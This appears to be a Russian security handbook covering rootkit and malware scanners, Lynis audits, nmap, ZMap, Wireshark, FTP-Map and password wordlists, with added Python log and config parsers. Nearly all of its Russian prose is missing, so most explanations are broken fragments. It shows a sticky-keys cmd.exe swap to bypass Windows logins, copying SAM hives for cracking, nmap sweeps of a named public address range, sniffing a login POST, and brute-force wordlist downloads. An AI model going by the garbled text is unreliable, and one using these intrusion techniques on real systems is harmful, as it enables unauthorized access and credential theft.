[21:33:23] Warning: Hidden directory found: '/etc/.java: directory '
[21:33:23] Warning: Hidden directory found: '/dev/.udev: directory '
[21:33:23] Warning: Hidden file found: /dev/.initramfs: symbolic link to `/run/initramfs'
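An added example, not from the book, that reads warnings out of /var/log/rkhunter.log in the format shown above, attributes each to the check that raised it, and separates entries already on a reviewed baseline from ones that still need a look; the log excerpt and the KNOWN_HIDDEN baseline are constructed for the example.

```python
import re
from collections import defaultdict
from typing import Dict, List, NamedTuple


class Finding(NamedTuple):
    check: str     # the "Checking ..." test that raised the warning
    message: str   # text after "Warning:"
    path: str      # first filesystem path in the message, "" if none
    known: bool    # True when the path is on the reviewed baseline below


# Constructed excerpt of /var/log/rkhunter.log, modelled on the warnings quoted above.
SAMPLE_LOG = """\
[21:33:20] Checking for prerequisites [ OK ]
[21:33:21] /usr/bin/ssh [ OK ]
[21:33:23] Checking /dev for suspicious file types [ Warning ]
[21:33:23] Warning: Suspicious file types found in /dev:
[21:33:23]          /dev/shm/pulse-shm-1234: data
[21:33:23] Checking for hidden files and directories [ Warning ]
[21:33:23] Warning: Hidden directory found: '/etc/.java: directory '
[21:33:23] Warning: Hidden directory found: '/dev/.udev: directory '
[21:33:23] Warning: Hidden file found: /dev/.initramfs: symbolic link to `/run/initramfs'
[21:33:24] Checking if SSH root access is allowed [ Warning ]
[21:33:24] Warning: The SSH and rkhunter configuration options should be the same:
"""

# Hidden entries that stock Debian/Ubuntu installs create; rkhunter.conf's
# ALLOWHIDDENDIR / ALLOWHIDDENFILE options exist to whitelist exactly these.
# This baseline is constructed for the example: build yours from a clean install.
KNOWN_HIDDEN = {"/etc/.java", "/dev/.udev", "/dev/.initramfs"}

LOG_LINE = re.compile(r"^\[\d\d:\d\d:\d\d\]\s+(.*)$")
CHECK_WARN = re.compile(r"^(Checking .*?)\s+\[\s*Warning\s*\]$")
WARNING = re.compile(r"^Warning:\s+(.*)$")
PATH = re.compile(r"'?(/[^\s:'`]+)")


def parse_warnings(log: str) -> List[Finding]:
    """Extract every 'Warning:' line, attributed to the check that preceded it."""
    findings: List[Finding] = []
    current_check = "(unknown check)"
    for raw in log.splitlines():
        m = LOG_LINE.match(raw)
        if not m:
            continue
        body = m.group(1)
        check = CHECK_WARN.match(body)
        if check:
            current_check = check.group(1)
            continue
        warn = WARNING.match(body)
        if not warn:
            continue                      # detail lines and [ OK ] results
        message = warn.group(1)
        p = PATH.search(message)
        path = p.group(1) if p else ""
        findings.append(Finding(current_check, message, path, path in KNOWN_HIDDEN))
    return findings


def triage(findings: List[Finding]) -> Dict[str, List[Finding]]:
    """Split findings into ones already on the baseline and ones needing a human look."""
    return {
        "known": [f for f in findings if f.known],
        "review": [f for f in findings if not f.known],
    }


def by_check(findings: List[Finding]) -> Dict[str, int]:
    """Count warnings per rkhunter check, for a quick overview of what fired."""
    counts: Dict[str, int] = defaultdict(int)
    for f in findings:
        counts[f.check] += 1
    return dict(counts)


if __name__ == "__main__":
    result = triage(parse_warnings(SAMPLE_LOG))
    for f in result["review"]:
        print(f"REVIEW  [{f.check}] {f.message}")
    for f in result["known"]:
        print(f"known   [{f.check}] {f.path}")
```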

Rootkit Hunter .
, , rkhunter "update".
,
wget:
$ sudo rkhunter --update

rkhunter cronjob "cronjob", rkhunter



/var/log/rkhunter.log .
, rkhunter ,
. , rkhunter
- ? -, ,
. ,
,
. ,
, rkhunter
.
,
, ,
,
.
, , ,
,
. ,
- , , .

48. Linux
Linux 6 ?
. Shellshock, Heartbleed, Poodle, Ghost , ,
. - Linux,
. ? openVPN
? SSH ?
Linux. , ,
, .
Lynis. Lynis
. ,
.
Lynis.
Linux?
Lynis
.
.

. Lynis
,
. ,
.
Lynis:
1.
2.
3.

Lynis (, yum apt-get),


, Lynis.
.
Lynis
, Lynis
.
. , ,

, .
Lynis, .
Red Hat: $ sudo yum install lynis
Debian: $ sudo apt-get install lynis
, , . !
?
Lynis
, .
( /usr/local/lynis)
Lynis ( ).
mial@mial-VirtualBox ~ $ sudo -s
[sudo] password for mial:
mial-VirtualBox ~ # mkdir /usr/local/lynis
mial-VirtualBox ~ # cd /usr/local/lynis/
mial-VirtualBox lynis #

Lynis
() Lynis (
lynis-1.6.4.tar.gz). wget (
). Mac OS curl, BSD
fetch.
mial-VirtualBox lynis # wget https://cisofy.com/files/lynis-1.6.4.tar.gz
--2015-02-15 12:55:25-- https://cisofy.com/files/lynis-1.6.4.tar.gz
cisofy.com (cisofy.com) 149.210.134.182
cisofy.com (cisofy.com)|149.210.134.182|:443... .
HTTP- . ... 200 OK
: 171953 (168K) [application/octet-stream]
: lynis-1.6.4.tar.gz

100%[======================================>] 171,953 168KB/s 1.0s

2015-02-15 12:55:29 (168 KB/s) - lynis-1.6.4.tar.gz [171953/171953]

mial-VirtualBox lynis # sha256sum lynis-1.6.4.tar.gz
886c74b591706f896149fe74adb481b58c549d32243d0cf620b46dfdd25dc66d lynis-1.6.4.tar.gz
mial-VirtualBox lynis #

, , .
SHA1, SHA256 .
, sha1,
sha1sum, sha256sum openssl.

mial-VirtualBox lynis # sha1sum lynis-1.6.4.tar.gz
mial-VirtualBox lynis # sha1 lynis-1.6.4.tar.gz
mial-VirtualBox lynis # openssl sha1 lynis-1.6.4.tar.gz


, -.
, ,
, .

lynis:
mial-VirtualBox lynis # tar zxvf lynis-1.6.4.tar.gz
mial-VirtualBox lynis # cd lynis/

Lynis
Lynis ,
:
mial-VirtualBox lynis # ./lynis --help

[ Lynis 1.6.4 ]

##########################################################################
Lynis comes with ABSOLUTELY NO WARRANTY. This is free software, and you are
welcome to redistribute it under the terms of the GNU General Public License.
See the LICENSE file for details about using this software.

Copyright 2007-2014 - CISOfy & Michael Boelen, http://cisofy.com
Enterprise support and plugins available via CISOfy - http://cisofy.com
##########################################################################

[+] Initializing program
------------------------------------
Scan options:
--auditor "<name>" : Auditor name
--check-all (-c) : Check system
--no-log : Don't create a log file
--pentest : Non-privileged scan (useful for pentest)
--profile <profile> : Scan the system with the given profile file
--quick (-Q) : Quick mode, don't wait for user input
--tests "<tests>" : Run only tests defined by <tests>
--tests-category "<category>" : Run only tests defined by <category>

Layout options:
--no-colors : Don't use colors in output
--quiet (-q) : No output, except warnings
--reverse-colors : Optimize color display for light backgrounds

Misc options:
--check-update : Check for updates
--debug : Debug logging to screen
--view-manpage (--man) : View man page
--version (-V) : Display version number and quit

Enterprise options:
--plugin-dir "<path>" : Define path of available plugins
--upload : Upload data to central node

See man page and documentation for all available options.

Lynis
Linux Mint Lynis.
./lynis --auditor "MiAl" -c -Q

- PHP:
[+] Software: PHP

Checking PHP [ NOT FOUND ]


Checking PHP disabled functions [ NONE ]
include/tests_php php.ini.
:
mial-VirtualBox lynis # ./lynis -c
()
mial-VirtualBox lynis # ./lynis --auditor "WebWare.biz" -c -Q
()
mial-VirtualBox lynis # ./lynis --auditor "WebWare.biz" -c -Q -q
()
mial-VirtualBox lynis # ./lynis --auditor "WebWare.biz" -c -q -Q --pentest
( )
Lynis
Lynis /var/log/lynis.log. Lynis
Shellshock . , ,
.
-
. . Lynis .
/var/log/lynis.log
.

, Lynis ( ):
, Lynis .
.
GPLv3 .
.
,
. -
.

, :
HTML ( ).
.
CVE HTML .
.
SQLi .
/.
, config/include .

, ,
. , Lynis
. , Linux, Windows Unix
. ,
. Lynis ,
,
( ) .

.
: Lynis
: http://cisofy.com/lynis/
:
: GPLv3
http://cisofy.com/downloads/
, , ,
, .

49. Linux Malware Detect (LMD) Linux


, , Linux,
, RHEL, CentOS, Fedora, Debian, Ubuntu, Mint.
, Apache
DOS , mod_security mod_evasive.
LMD (Linux Malware Detect).
Malware?
Malware () , ,

. (malware)
, , , ,
,
.
Linux Malware Detect (LMD)?
Linux Malware Detect (LMD) ,
Unix/Linux ,
GNU GPLv2. ,
. , ,

, ,
, , //
.
Linux Malware Detect.
http://www.rfxn.com/projects/linux-malware-detect/.
Linux Malware Detect (LMD) RHEL, CentOS, Fedora, Debian,
Ubuntu, Mint.
1: Linux Malware Detect (LMD)
LMD, wget.
cd /tmp
wget http://www.rfxn.com/downloads/maldetect-current.tar.gz

2: LMD
LMD ,
.
tar xfz maldetect-current.tar.gz
cd maldetect-*
./install.sh
, Debian, Ubuntu, Mint ( , sudo)
:
./install.sh
:
sudo ./install.sh
, -.
:

3: LMD
,
, , . ,
- , .
email_alert : ,
1.
email_subj : .
email_addr :
.
quar_hits : ,
1.
quar_clean : ,
1.
quar_susp : ,
, .
quar_susp_minuid : userid .
/usr/local/maldetect/conf.maldet
.
vi /usr/local/maldetect/conf.maldet


:
# [ EMAIL ALERTS ]
##
# The default email alert toggle
# [0 = disabled, 1 = enabled]
email_alert=1

# The subject line for email alerts
email_subj=" $(hostname)"

# The destination addresses for email alerts
# [ values are comma (,) spaced ]
email_addr="alexey@webware.biz"

# Ignore e-mail alerts for reports in which all hits have been cleaned.
# This is ideal on very busy servers where cleaned hits can drown out
# other more actionable reports.
email_ignore_clean=0

##
# [ QUARANTINE OPTIONS ]
##
# The default quarantine action for malware hits
# [0 = alert only, 1 = move to quarantine & alert]
quar_hits=1

# Try to clean string based malware injections
# [NOTE: quar_hits=1 required]
# [0 = disabled, 1 = clean]
quar_clean=1

# The default suspend action for users wih hits
# Cpanel suspend or set shell /bin/false on non-Cpanel
# [NOTE: quar_hits=1 required]
# [0 = disabled, 1 = suspend account]
quar_susp=0
# minimum userid that can be suspended
quar_susp_minuid=500
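The quarantine options above depend on each other (the file's own comments say quar_clean and quar_susp require quar_hits=1). This added example, not part of LMD or the book, parses a conf.maldet excerpt and reports combinations that silently weaken the response; the excerpt, its subject line and every check beyond the quar_hits dependency are this example's assumptions.

```python
import re
from typing import Dict, List

# Constructed excerpt of /usr/local/maldetect/conf.maldet in the form shown above
# (shell-style key=value lines, values optionally quoted, '#' comment lines).
SAMPLE_CONF = """\
# [ EMAIL ALERTS ]
# The default email alert toggle
# [0 = disabled, 1 = enabled]
email_alert=1
email_subj="maldet alert from $(hostname)"
email_addr="alexey@webware.biz"
email_ignore_clean=0

# [ QUARANTINE OPTIONS ]
quar_hits=1
quar_clean=1
quar_susp=0
quar_susp_minuid=500
"""

KEY_VALUE = re.compile(r'^\s*([A-Za-z_][A-Za-z0-9_]*)\s*=\s*(.*?)\s*$')


def parse_conf(text: str) -> Dict[str, str]:
    """Parse conf.maldet into a dict; a later assignment overrides an earlier one, as in the shell."""
    conf: Dict[str, str] = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        m = KEY_VALUE.match(line)
        if not m:
            continue
        key, value = m.group(1), m.group(2)
        # strip one pair of matching surrounding quotes
        if len(value) >= 2 and value[0] == value[-1] and value[0] in "\"'":
            value = value[1:-1]
        conf[key] = value
    return conf


def check_conf(conf: Dict[str, str]) -> List[str]:
    """Return the settings that silently weaken LMD's response to a hit.

    The quar_hits dependency is the one the file's own comments state
    ("[NOTE: quar_hits=1 required]"); the remaining checks are this
    example's reading of what each option implies.
    """
    findings: List[str] = []

    def get(key: str) -> str:
        return conf.get(key, "")

    if get("email_alert") == "1" and not get("email_addr"):
        findings.append("email_alert=1 but email_addr is empty: alerts are generated but delivered nowhere")
    if get("quar_hits") != "1":
        findings.append("quar_hits is not 1: hits are only reported, infected files stay in place")
    if get("quar_clean") == "1" and get("quar_hits") != "1":
        findings.append("quar_clean=1 has no effect without quar_hits=1")
    if get("quar_susp") == "1":
        if get("quar_hits") != "1":
            findings.append("quar_susp=1 has no effect without quar_hits=1")
        minuid = get("quar_susp_minuid")
        # system accounts live below the distribution's first regular UID (500 or 1000)
        if not minuid.isdigit() or int(minuid) < 500:
            findings.append(f"quar_susp_minuid={minuid!r}: account suspension could reach system accounts")
    return findings


if __name__ == "__main__":
    conf = parse_conf(SAMPLE_CONF)
    print(check_conf(conf) or ["conf.maldet: no weak settings found"])
```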

4:
,
:
maldet --scan-all /home

, ,
, ,
:
# maldet --quarantine SCANID

:
# maldet --clean SCANID

5:
LMD /etc/cron.daily/maldet,
, ,
. .
.
,
:
vi /etc/cron.daily/maldet

50. Windows?
Windows ( ),
, , .

Windows
.
ElcomSoft System
Recovery, ( ,
,
, - 1, 1111, 123, admin,
password, ).
Kali Linux.
, Kali Linux 1) Windows, 2)
,
.
, . 99.99%
, - .
, Live- (
Linux ). C:\Windows\System32\ cmd.exe
sethc.exe osk.exe. , sethc.exe (
osk.exe), cmd.exe .
sethc.exe, Windows,
, SHIFT, osk.exe,
.
(cmd.exe) :
net user _ *
.. admin, :
net user admin *

.
.

Windows Kali Linux


: Windows ?
Windows SAM (System Account Management)
( ). ,
Active Directoryis. Active Directoryis ,
LDAP. SAM
C:\<systemroot>\System32\config\ (C:\<systemroot>\sys32\config\).
SAM , LM NTLM,
.
: .
,
SAM Windows .
SAM ( ),
- .
SAM C:\.
Linux, Kali, Live-.
SAM C:\<systemroot>\repair.
SAM .
, , ,
, .
expand. Expand [FILE] [DESTINATION].
SAM uncompressedSAM.
C:\> expand SAM uncompressedSAM

, Microsoft Windows 2000


SYSKEY. SYSKEY
SAM 128- ,
Windows.
Windows SYSKEY (
) :
1. (, Kali).
2. SAM SYSTEM (C:\<systemroot>\System32\config\
(C:\<systemroot>\sys32\config\)).
3. SYSTEM bkreg bkhive.
4. .
5. , John the Ripper.
. Windows
MAC (, ), .
,
( ) .

Windows
Windows- SAM SYSKEY.
Windows
, , Microsoft
Windows .
fdisk -l .
Windows . fdisk NTFS
, :
Device Boot Start End Blocks Id System
/dev/hdb1* 1 2432 19535008+ 86 NTFS
/dev/hdb2 2433 2554 979965 82 Linux swap/Solaris
/dev/hdb3 2555 6202 29302560 83 Linux
:
mkdir /mnt/windows
Windows
:
mount -t <WindowsType> <Windows partition> /mnt/windows

, Windows ,
SAM SYSTEM :
cp SAM SYSTEM /pentest/passwords/AttackDirectory
SAM. PwDumpand Cain, Abel samdump
.
, SAM.
SAM. ,
SAM .
bkreg bkhiveare ,
, :

Windows:
-, .
-. ,
. ( BIOS
,
).
,
VeraCrypt TrueCrypt (
, ).
Windows ,
, ,
( ) . .
.

7. 7. .
51.

, . :
:
(Kali Linux) ,
( -,
, -, ,
--, XSS ..);
: ,
,
, -, , DNS;
-: -
, -
.
, . ,
. PHP
Windows.
Windows
. ,
Kali Linux. Kali Linux
, Kali Windows
, .
Kali Linux
.
, .
- Windows
VirtualBox Kali Linux. ,

,
. .
Kali Linux -
Windows
, Kali Linux .
: Windows-.
( , ..
DHCP), ,
( Kali).
Windows, Windows :
ipconfig
192.168.1.35 ( ,
).
: (C:\Server\bin\Apache24\conf\httpd.conf)
:
Listen 127.0.0.1:80
:
Listen *:80 ( , -
!);
Listen _IP_Windows:80 ();
:
Listen 192.168.1.35:80
, .
: .
NAT, . ,
, .

: .
Windows. , Kali 192.168.1.35
, .
: , /
Windows.
, Kali Windows.


. .
,
Linux. DNS ,
. .
IP Linux,
:
ifconfig
- . ,
. ,
. Linux , ,
, 512 .
1-1,3
. - ,
, 2 3.
.

52. NMAP Linux


Nmap ,
.
Linux, ,
. Nmap, ,
( IP)
, /,
,
, , .
.
. ,
, .
Nmap
, nmap .
Nmap Kali Linux
Nmap .

Nmap CentOS
yum install nmap

Nmap Debian
apt-get install nmap

Nmap Ubuntu
sudo apt-get install nmap

Nmap
nmap.
:
nmap --help

,
.
nmap, .
.
.
, nmap
. Kali Linux ,
sudo. sudo, Kali
, sudo.

,

(
webware.biz). :
sudo nmap -sS [IP ] [ -]

nmap ,
. ,
, .
.
sudo nmap -O --osscan-guess [IP ] [ -]

, .
, VERSION
.
sudo nmap -sV [IP ] [ -]

-, , -, SSH, FTP
, Nmap, .
193.106.148-153.1-255.
193.106.148.* 193.106.153.*,
*.*.*1 *.*.*255, .. 193.106.148.1-
255, 193.106.149.1-255, 193.106.150.1-255 ..
, -, -
, -, - 80, 8080 1080.
, - ,
.
nmap -sS -sV -vv -n -Pn -T5 193.106.148-153.1-255 -p80,8080,1080 -oG - | grep 'open'
, ,
.

( , )
FTP
FTP 21 , ,
.
nmap -sS -sV -vv -n -Pn -T5 193.106.148-153.1-255 -p21 -oG - | grep 'open'

, .
SSH
SSH 22, .
nmap -sS -sV -vv -n -Pn -T5 193.106.148-153.1-255 -p22 -oG - | grep 'open'
:

, (
), (,
FTP ,
, FTP ).
SSH .
, ,
,
. FTP,
, SFTP ( FTP ).

, .
.. /,
(65535).
,
ftp ( | grep 'ftp'), ssh ( | grep 'ssh') . . :
nmap -sS -sV -vv -n -Pn -T5 193.106.148.1-255 -p1-65535 -oG - | grep 'ftp'
.
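The grep 'open' / grep 'ftp' pipelines above work on nmap's grepable output (-oG). As an added example that is not from the book, here is a parser that turns that output into structured records, filters them by service name and groups open ports per host, which is what an inventory or allowed-ports comparison needs; the sample output, addresses and banners are constructed.

```python
import re
from collections import defaultdict
from typing import Dict, List, NamedTuple


class OpenPort(NamedTuple):
    host: str
    port: int
    proto: str
    service: str
    version: str


# Constructed sample of grepable output (-oG -), shaped like the scans above;
# the addresses and service banners are made up for this example.
SAMPLE_GREPABLE = """\
# Nmap 7.01 scan initiated as: nmap -sS -sV -vv -n -Pn -T5 193.106.148.1-255 -p21,22,80 -oG -
Host: 193.106.148.10 ()\tStatus: Up
Host: 193.106.148.10 ()\tPorts: 21/open/tcp//ftp//vsftpd 3.0.2/, 22/open/tcp//ssh//OpenSSH 6.7p1 Debian/, 80/closed/tcp//http///
Host: 193.106.148.11 ()\tPorts: 21/filtered/tcp//ftp///, 80/open/tcp//http//Apache httpd 2.4.10/\tIgnored State: closed (1)
Host: 193.106.148.12 ()\tStatus: Down
# Nmap done at Sat Aug  1 12:00:00 2015 -- 255 IP addresses (2 hosts up) scanned in 12.34 seconds
"""


def parse_grepable(text: str) -> List[OpenPort]:
    """Return every port reported as open, in the order nmap printed them.

    A "Host:" line is tab-separated into "Key: value" fields; the Ports field
    holds comma-separated entries of the form
    port/state/protocol/owner/service/rpc-info/version/.
    """
    found: List[OpenPort] = []
    for line in text.splitlines():
        if not line.startswith("Host:"):
            continue                      # comment lines and the trailer
        fields: Dict[str, str] = {}
        for field in line.split("\t"):
            key, sep, value = field.partition(": ")
            if sep:
                fields[key] = value
        ports = fields.get("Ports")
        if not ports:
            continue                      # "Status: Up/Down" lines carry no ports
        host = fields["Host"].split()[0]  # drop the "(hostname)" part, empty under -n
        for entry in ports.split(", "):
            parts = entry.split("/")
            if len(parts) < 7 or parts[1] != "open":
                continue
            found.append(OpenPort(host, int(parts[0]), parts[2], parts[4], parts[6]))
    return found


def filter_service(ports: List[OpenPort], name: str) -> List[OpenPort]:
    """The structured equivalent of piping -oG output through grep 'ftp'."""
    return [p for p in ports if p.service == name]


def open_ports_by_host(ports: List[OpenPort]) -> Dict[str, List[int]]:
    """Group open port numbers per host, e.g. to diff against an allowed-ports baseline."""
    by_host: Dict[str, List[int]] = defaultdict(list)
    for p in ports:
        by_host[p.host].append(p.port)
    return dict(by_host)


if __name__ == "__main__":
    ports = parse_grepable(SAMPLE_GREPABLE)
    for p in ports:
        print(f"{p.host}:{p.port}/{p.proto} {p.service} {p.version}".rstrip())
    print("hosts with ftp open:", [p.host for p in filter_service(ports, "ftp")])
```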

Zenmap (GUI) Nmap


nmap .
- , Zenmap.
Nmap.

( , )
, .
, .
,
. , , .
, .

( , )

( , )

Nmap
, , ,
FTP ?
Nmap,
. .
:
-,
. ,
,
-. ,
, ,
phpMyAdmin . .
FTP, SSH . ,
FTP
, SSH.
.
, , -
, .
. ()
. : --,
, , -
. .

. .
, Armitage. :
, .
.
Armitage: Armitage:
Kali Linux.
?
VPS,
.
, .
Nmap ,

:
Nmap
BruteX:
THC-Hydra: ( )
Offensive Security ( Kali Linux)
Metasploit Exploitation Framework searchsploit

Armitage: Kali
Linux
FTP-Map: FTP-

:
SFTP Linux
ssh
VPS (VDS) Debian. : Apache,
PHP, MySQL
fail2ban Apache HTTP


- Apache PHP ( Linux Windows)
- Apache mod_security mod_evasive
CentOS
ModSecurity (mod_security) Apache ( Windows)
Apache, MariaDB/MySQL PHP CentOS (LAMP)

53. Nmap
: https://nmap.org/man/ru/
Nmap ( ): https://nmap.org/nsedoc/index.html
Nmap ( ):
http://nmap.org/book/man.html
Nmap Nmap ( ):
http://nmap.org/book/toc.html
: http://webware.biz/?p=4540#5

54. - WireShark
( )
, ,
- ENTER, . ,
. -?? (,
) - HTTP
(PlainText), (
) . , -
-, HTTP . ,

(BGP ,
).
, , ,
HTTP.
, , , ,

.
, -.
. VirtualBox/VMWare/
.
: ,
.

1. Wireshark
Kali Linux Wireshark
> Kali Linux > Top 10 Security Tools > Wireshark
Wireshark Capture > Interface
, , eth0,
wlan0.

, Start Wireshark .
, Capture > Start

2. POST
, Wireshark .
-, .
,
Wireshark. , .
, ,
, .

Wireshark . ,
POST.
POST?
,
POST.
POST,
:
http.request.method == "POST"
. 1 POST.

( , )

3: POST
Follow TCP Steam

( , )

, - :

log=Dimon&pwd=justfortest?
..
log=Dimon ( : Dimon)
pwd=justfortest (: justfortest)
, WebWare.biz .
WireShark

1. . ,
Wi-Fi , .
2. , , ,
. (
), ,
, . ,
.
.
, ,

,
.
3. VPN,
.
4. SSL-.
: . : , ,
, - SSL-, ,
. :
( , , , -, - . .)
. !
, SSL-.
( ,
/ / ),
SSL- ( ,
). , , ,
400 . ,
SSL-.
- ,
SSL-,
. , , .

55. FTP-Map:
FTP-
Ftpmap FTP- ,
.

,
. FTP-Map /,
FTP . FTP-Map
.
: https://github.com/Hypsurus/ftpmap
FTP-Map Kali Linux
apt-get install automake autoconf
~/opt
cd ~/opt/
git clone git://github.com/Hypsurus/ftpmap
cd ftpmap/
autoreconf
./configure
make
sudo make install

FTP-Map
ftpmap -s [host] [OPTIONS]...

:
--scan, -S - FTP .
--server, -s <host> - FTP .
--port, -P <port> - FTP ( : 21).
--user, -u <user> - FTP ( : anonymous).
--password, -p <password> - FTP ( : NULL).
--execute, -x <cmd> - FTP .
--nofingerprint, -n - .
--login, -A - , .
--force, -F - .
--output, -o <file> - .
--list, -L <path> - FTP .
--delete <path> - / .
--last-modified, -m <file> -

Fuzzer:
--fuzzer, -f - Fuzzer.
--fuzzerlength,-b <> - . ( : 256)
--fuzzer-nologin, -l - .

:
--version, -v - .
--help, -h - .

, ( hypsurus@mail.ru )

, .

56. ZMap IPv4


45
ZMap ,
. , ZMap
IPv4 45 .
PF_RING, ZMap IPv4 5 .

. ZMap
. ,
. ZMap GNU/Linux
TCP SYN ICMP .
ZMap 1300 Nmap
.
: https://github.com/zmap/zmap

ZMap
ZMap, , 64- .
600 . CMake 2.8.12 .

ZMap
Fedora 19+
:
yum install zmap
Archlinux, , AUR
: https://aur.archlinux.org/packages/zmap/

ZMap
ZMap Kali Linux
Kali Linux . :
CMake 2.8.12 or higher is required. You are running version 2.8.9
.. CMake 2.8.12 , Kali CMake 2.8.9.
ZMap GMP
, gengetopt libpcap. ZMap flex byacc.
Debian :
sudo apt-get install build-essential cmake libgmp3-dev gengetopt libpcap-dev flex byacc libjson-c-dev pkg-config
RHEL- Fedora :
sudo yum install gmp gmp-devel gengetopt libpcap-devel flex byacc
https://github.com/zmap/zmap
git clone https://github.com/zmap/zmap.git
, , 3 :
cmake [-DWITH_REDIS=ON] [-DWITH_JSON=ON] [-DENABLE_DEVELOPMENT=ON] ./
make
sudo make install
Linux Mint , :
-- Install configuration: ""
CMake Error at InstallConfFiles.cmake:2 (file):
file COPY cannot find
"/home/mial/opt/zmap.git/tags/v2.1.0-RC2/$./conf/blacklist.conf".
Call Stack (most recent call first):
cmake_install.cmake:36 (include)

Makefile:66: install
make: *** [install] 1

, ,
InstallConfFiles.cmake. :
if(NOT EXISTS "/etc/zmap/blacklist.conf")
  file(COPY "${PROJECT_SOURCE_DIR}/conf/blacklist.conf" DESTINATION "${CONFIG_DESTINATION}/blacklist.conf")
endif()

if(NOT EXISTS "/etc/zmap/zmap.conf")
  file(COPY "${PROJECT_SOURCE_DIR}/conf/zmap.conf" DESTINATION "${CONFIG_DESTINATION}/zmap.conf")
endif()
:
if(NOT EXISTS "/etc/zmap/blacklist.conf")
  file(COPY "./conf/blacklist.conf" DESTINATION "${CONFIG_DESTINATION}/blacklist.conf")
endif()

if(NOT EXISTS "/etc/zmap/zmap.conf")
  file(COPY "./conf/zmap.conf" DESTINATION "${CONFIG_DESTINATION}/zmap.conf")
endif()
.. , -
${PROJECT_SOURCE_DIR}, ,
: .
.
ZMap
ZMap ,
:
Jul 08 17:02:45.814 [FATAL] recv: could not open device eth0: eth0: You don't have permission to capture on that device (socket: Operation not permitted)
.
10000 80
10 :
zmap --bandwidth=10M --target-port=80 --max-targets=10000 --output-file=results.csv
, :
zmap -B 10M -p 80 -n 10000 -o results.csv
, ZMap
CIDR. , 10.0.0.0/8 192.168.0.0/16
80 :
zmap -p 80 -o results.csv 10.0.0.0/8 192.168.0.0/16
ZMap .


8. .
57. : ,
,
(
). , , .
, , .
.
. ,
, .
,
, , .
:
.
, .
.
.
:
,
,
. ,
. .. IP
,
. ,
;
Wi-Fi ( ),
,
, , ;
, , ,
, .
, : .
.
- , (, ) :
wc -l <file>
, , Kali Linux.
, , .



SSH, FTP, , HTTP ,
. .
THC-Hydra, Medusa, Patator, BruteX.

BruteX (,
).
http://download.openwall.net/pub/wordlists/.
,
, , Patator.
:
wget https://raw.githubusercontent.com/1N3/BruteX/master/namelist.txt

:
wget https://raw.githubusercontent.com/1N3/BruteX/master/password.lst

Linux:
wget https://raw.githubusercontent.com/1N3/BruteX/master/simple-users.txt

nmap, ,
:
/usr/share/nmap/nselib/data/passwords.lst

Metasploit:
/usr/share/wordlists/metasploit-jtr/common_roots.txt
/usr/share/wordlists/metasploit-jtr/password.lst
.

, ,
.
BruteX:
wget https://raw.githubusercontent.com/1N3/BruteX/master/dirbuster.txt
wget https://raw.githubusercontent.com/1N3/BruteX/master/dirbuster-ext.txt
( )

dirb DIRB.
.
:
/usr/share/dirb/wordlists
/usr/share/dirbuster/wordlists


:
root@WebWare:~# tree /usr/share/wordlists/dirb*
/usr/share/wordlists/dirb
├── big.txt
├── catala.txt
├── common.txt
├── euskera.txt
├── extensions_common.txt
├── indexes.txt
├── mutations_common.txt
├── others
│   ├── best1050.txt
│   ├── best110.txt
│   ├── best15.txt
│   └── names.txt
├── small.txt
├── spanish.txt
├── stress
│   ├── alphanum_case_extra.txt
│   ├── alphanum_case.txt
│   ├── char.txt
│   ├── doble_uri_hex.txt
│   ├── test_ext.txt
│   ├── unicode.txt
│   └── uri_hex.txt
└── vulns
    ├── apache.txt
    ├── axis.txt
    ├── cgis.txt
    ├── coldfusion.txt
    ├── domino.txt
    ├── fatwire_pagenames.txt
    ├── fatwire.txt
    ├── frontpage.txt
    ├── hpsmh.txt
    ├── hyperion.txt
    ├── iis.txt
    ├── iplanet.txt
    ├── jboss.txt
    ├── jersey.txt
    ├── jrun.txt
    ├── netware.txt
    ├── oracle.txt
    ├── ror.txt
    ├── sap.txt
    ├── sharepoint.txt
    ├── sunas.txt
    ├── tests.txt
    ├── tomcat.txt
    ├── vignette.txt
    ├── weblogic.txt
    └── websphere.txt
/usr/share/wordlists/dirbuster
├── apache-user-enum-1.0.txt
├── apache-user-enum-2.0.txt
├── directories.jbrofuzz
├── directory-list-1.0.txt
├── directory-list-2.3-medium.txt
├── directory-list-2.3-small.txt
├── directory-list-lowercase-2.3-medium.txt
└── directory-list-lowercase-2.3-small.txt

3 directories, 54 files
, , ,
DIRB.

Wi-Fi
rockyou .
, Wi-Fi.
Kali, :
/usr/share/wordlists/rockyou.txt.gz


:
/usr/share/wordlists/fern-wifi
Wi-Fi, , - .
(, )
Kali, :
/usr/share/sqlmap/txt/wordlist.txt

Metasploit
Metasploit .
, :
root@WebWare:~# tree /usr/share/wordlists/metasploit
/usr/share/wordlists/metasploit
├── av-update-urls.txt
├── burnett_top_1024.txt
├── burnett_top_500.txt
├── cms400net_default_userpass.txt
├── db2_default_pass.txt
├── db2_default_userpass.txt
├── db2_default_user.txt
├── default_pass_for_services_unhash.txt
├── default_userpass_for_services_unhash.txt
├── default_users_for_services_unhash.txt
├── dlink_telnet_backdoor_userpass.txt
├── hci_oracle_passwords.csv
├── http_default_pass.txt
├── http_default_userpass.txt
├── http_default_users.txt
├── http_owa_common.txt
├── idrac_default_pass.txt
├── idrac_default_user.txt
├── ipmi_passwords.txt
├── ipmi_users.txt
├── joomla.txt
├── keyboard-patterns.txt
├── malicious_urls.txt
├── multi_vendor_cctv_dvr_pass.txt
├── multi_vendor_cctv_dvr_users.txt
├── namelist.txt
├── oracle_default_hashes.txt
├── oracle_default_passwords.csv
├── oracle_default_userpass.txt
├── postgres_default_pass.txt
├── postgres_default_userpass.txt
├── postgres_default_user.txt
├── root_userpass.txt
├── rpc_names.txt
├── rservices_from_users.txt
├── sap_common.txt
├── sap_default.txt
├── sap_icm_paths.txt
├── sensitive_files.txt
├── sensitive_files_win.txt
├── sid.txt
├── snmp_default_pass.txt
├── tftp.txt
├── tomcat_mgr_default_pass.txt
├── tomcat_mgr_default_userpass.txt
├── tomcat_mgr_default_users.txt
├── unix_passwords.txt
├── unix_users.txt
├── vnc_passwords.txt
├── vxworks_collide_20.txt
└── vxworks_common_20.txt

0 directories, 51 files
:
/usr/share/wordlists/metasploit


()
.

Router Scan v2.52 by StasM ,


- . .
. auth_basic.txt
auth_digest.txt ( HTTP ).
, ,
Linux . , , . .
.
.
, . ,
.
.

58. PW-Inspector:

. ))
. .
, ( ),
, , :
, . ,
, ,
. , Wi-Fi 8
63. .
, ,
. , ,
.
PW-Inspector , .
:
pw-inspector [-i FILE] [-o FILE] [-m MINLEN] [-M MAXLEN] [-c MINSETS] -l -u -n -p -s

Options:
